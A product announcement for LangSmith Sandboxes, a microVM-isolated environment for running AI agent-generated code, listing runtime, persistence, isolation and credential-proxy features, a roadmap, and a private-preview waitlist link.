Secure Code Execution for AI Agents

LangSmith Sandboxes enable AI agents to safely run arbitrary code in locked-down environments without risking your infrastructure. Unlike traditional containers designed for known application code, sandboxes are built for untrusted, unpredictable agent-generated code—which can attempt destructive or malicious actions if not properly isolated.

Key Features Shipping Today

Runtime & Configuration:

• Bring your own Docker images or use LangSmith defaults for custom environments
• Sandbox templates let you define image, CPU, and memory once and reuse across multiple agent invocations
• Pooling and autoscaling prevent cold starts and automatically spin up additional sandboxes as demand increases

Execution Capabilities:

• Long-running sessions support persistent commands over WebSockets with real-time output streaming for minute-to-hour-long agent tasks
• Persistent state carries files, installed packages, and environment variables across multiple agent interactions
• Port tunnels expose sandbox services to your local machine for preview and testing

Security & Integration:

• Hardware-virtualized microVM isolation (kernel-level separation) between sandboxes, not just Linux namespaces
• Authentication Proxy ensures secrets never touch the runtime—credentials remain off the sandbox entirely
• Framework-agnostic SDKs for Python and JavaScript with native integration to LangChain's Deep Agents framework

Roadmap

LangSmith is actively developing shared volumes for cross-sandbox state management, binary authorization to restrict executable programs and network access, and full execution tracing inside VMs to provide audit logs of all processes and network calls.

Getting Started

Sign up for private preview at langchain.com/langsmith-sandboxes-waitlist to start building agents that safely execute code.